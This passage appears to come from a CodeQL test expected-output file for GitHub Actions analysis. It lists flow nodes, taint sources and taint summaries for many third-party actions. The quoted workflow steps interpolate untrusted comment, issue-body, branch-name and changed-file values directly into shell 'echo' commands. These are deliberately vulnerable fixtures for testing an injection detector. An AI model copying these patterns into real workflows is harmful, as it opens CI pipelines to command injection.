${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | -| 